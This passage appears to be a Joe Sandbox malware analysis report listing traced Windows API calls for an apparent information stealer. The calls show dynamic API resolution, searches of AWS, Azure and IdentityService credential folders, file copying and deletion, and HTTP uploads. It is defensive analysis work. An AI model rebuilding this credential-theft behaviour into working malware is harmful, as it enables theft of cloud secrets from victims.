                                                        • lstrlen.KERNEL32(004259C8), ref: 00B24939
                                                        • lstrlen.KERNEL32(00425A70), ref: 00B24944
                                                        • strlen.MSVCRT ref: 00B24957
                                                        • lstrlen.KERNEL32(00425B18), ref: 00B2497F
                                                        • lstrlen.KERNEL32(00425BC0), ref: 00B2498A
                                                        • lstrlen.KERNEL32(00425C68), ref: 00B24995
                                                        • lstrlen.KERNEL32(00425D10), ref: 00B249A0
                                                        • lstrlen.KERNEL32(00425DB8), ref: 00B249AB
                                                        • lstrlen.KERNEL32(00425E60), ref: 00B249BB
                                                        • lstrlen.KERNEL32(00425F08), ref: 00B249C6
                                                        • lstrlen.KERNEL32(00425FB0), ref: 00B249D1
                                                        • lstrlen.KERNEL32(00426058), ref: 00B249DC
                                                        • lstrlen.KERNEL32(00426100), ref: 00B249E7
                                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B24A03
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                        • String ID:
                                                        • API String ID: 2127927946-0
                                                        • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction ID: b6861695466288aec7f46d2f7e45e84b80412f1a0f0f77139afe7b0e0b410156
                                                        • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction Fuzzy Hash: 5C41A879740634EBC718AFE5FC89B987F71AB4C712BA0C062F90299190CBB5D5119B3E
                                                        Function 00B39AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B39B08
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B39B21
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B39B39
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B39B51
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B39B6A
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B39B82
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B39B9A
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B39BB3
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B39BCB
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B39BE3
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B39BFC
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B39C14
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B39C2C
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B39C45
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00B39C5D
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00B39C75
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00B39C8E
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00B39CA6
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00B39CBE
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00B39CD7
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00B39CEF
                                                        • LoadLibraryA.KERNEL32(0064A550,?,00B36C67), ref: 00B39D01
                                                        • LoadLibraryA.KERNEL32(0064A17C,?,00B36C67), ref: 00B39D12
                                                        • LoadLibraryA.KERNEL32(0064A104,?,00B36C67), ref: 00B39D24
                                                        • LoadLibraryA.KERNEL32(0064A1DC,?,00B36C67), ref: 00B39D36
                                                        • LoadLibraryA.KERNEL32(0064A328,?,00B36C67), ref: 00B39D47
                                                        • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00B39D69
                                                        • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00B39D8A
                                                        • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00B39DA2
                                                        • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00B39DC4
                                                        • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00B39DE5
                                                        • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00B39E06
                                                        • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00B39E1D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 2238633743-0
                                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction ID: a87cb595ebfe859e8152a93ea2a2edd90f7f986e8383f0bfe95b546f4b10d869
                                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction Fuzzy Hash: 2DA13CBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                        Function 00B304B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                          • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                          • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                          • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                          • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                          • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                          • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                        • strtok_s.MSVCRT ref: 00B30582
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00B305C9
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B305D0
                                                        • StrStrA.SHLWAPI(00000000,00421618), ref: 00B305EC
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B305FA
                                                          • Part of subcall function 00B38B47: malloc.MSVCRT ref: 00B38B4F
                                                          • Part of subcall function 00B38B47: strncpy.MSVCRT ref: 00B38B6A
                                                        • StrStrA.SHLWAPI(00000000,00421620), ref: 00B30636
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30644
                                                        • StrStrA.SHLWAPI(00000000,00421628), ref: 00B30680
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B3068E
                                                        • StrStrA.SHLWAPI(00000000,00421630), ref: 00B306CA
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B306DC
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30769
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30781
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30799
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B307B1
                                                        • lstrcat.KERNEL32(?,0042164C), ref: 00B307C9
                                                        • lstrcat.KERNEL32(?,00421660), ref: 00B307D8
                                                        • lstrcat.KERNEL32(?,00421670), ref: 00B307E7
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B307FA
                                                        • lstrcat.KERNEL32(?,00421678), ref: 00B30809
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3081C
                                                        • lstrcat.KERNEL32(?,0042167C), ref: 00B3082B
                                                        • lstrcat.KERNEL32(?,00421680), ref: 00B3083A
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3084D
                                                        • lstrcat.KERNEL32(?,00421688), ref: 00B3085C
                                                        • lstrcat.KERNEL32(?,0042168C), ref: 00B3086B
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3087E
                                                        • lstrcat.KERNEL32(?,00421698), ref: 00B3088D
                                                        • lstrcat.KERNEL32(?,0042169C), ref: 00B3089C
                                                        • strtok_s.MSVCRT ref: 00B308E0
                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B308F5
                                                        • memset.MSVCRT ref: 00B30944
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID:
                                                        • API String ID: 3689735781-0
                                                        • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                        • Instruction ID: bc72e083eaf7eab4a73ae803530e7266f270aaa2d79bb4cf3ee9cc19cf7a6027
                                                        • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                        • Instruction Fuzzy Hash: 93D15076A40208ABCB04FBF4DD96EEEB7B9EF15701F604598F142B6091DF34AA05CB61
                                                        Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00405A13
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0082B840,00000000,?,007F2AC8,00000000,?,00421A1C), ref: 00405E71
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                        • memcpy.MSVCRT(?), ref: 00405EFE
                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                        • HttpOpenRequestA.WININET(00000000,0082B8B0,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                        • String ID: "$"$------$------$------
                                                        • API String ID: 1406981993-2180234286
                                                        • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                        • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                        • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                        • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                        Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00414D87
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        • memset.MSVCRT ref: 00414E13
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        • memset.MSVCRT ref: 00414E9F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0082B7A0,?,000003E8), ref: 00414A4A
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                        • memset.MSVCRT ref: 00414F2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                        • API String ID: 4017274736-156832076
                                                        • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                        • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                        • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                        • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                        Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                        • lstrcatA.KERNEL32(?,00000000,00826768,00421474,00826768,00421470,00000000), ref: 0040D208
                                                        • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                        • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                        • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                        • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                        • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                        • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                        • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                        • lstrlenA.KERNEL32(?), ref: 0040D339
                                                        • memset.MSVCRT ref: 0040D388
                                                          • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                        • String ID:
                                                        • API String ID: 2775534915-0
                                                        • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                        • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                        • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                        • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                        Function 00B2D157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2D1EA
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B2D32E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B2D335
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D46F
                                                        • lstrcat.KERNEL32(?,00421478), ref: 00B2D47E
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D491
                                                        • lstrcat.KERNEL32(?,0042147C), ref: 00B2D4A0
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D4B3
                                                        • lstrcat.KERNEL32(?,00421480), ref: 00B2D4C2
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D4D5
                                                        • lstrcat.KERNEL32(?,00421484), ref: 00B2D4E4
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D4F7
                                                        • lstrcat.KERNEL32(?,00421488), ref: 00B2D506
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D519
                                                        • lstrcat.KERNEL32(?,0042148C), ref: 00B2D528
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D53B
                                                        • lstrcat.KERNEL32(?,00421490), ref: 00B2D54A
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                        • lstrlen.KERNEL32(?), ref: 00B2D591
                                                        • lstrlen.KERNEL32(?), ref: 00B2D5A0
                                                        • memset.MSVCRT ref: 00B2D5EF
                                                          • Part of subcall function 00B3ACD7: StrCmpCA.SHLWAPI(0064A350,00B2AA0E,?,00B2AA0E,0064A350), ref: 00B3ACF6
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2D61B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                        • String ID:
                                                        • API String ID: 1973479514-0
                                                        • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                        • Instruction ID: a29cf17a3239687ad1fa019d40a013c96fcd566c7d404b2c53821cf466ef105b
                                                        • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                        • Instruction Fuzzy Hash: 9AE15D76950118ABCB04FBE0DD96EEE73B9AF15701F704199F146B20A1DE34AA08CF62
                                                        Function 00B25BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B25C5F
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B25C7A
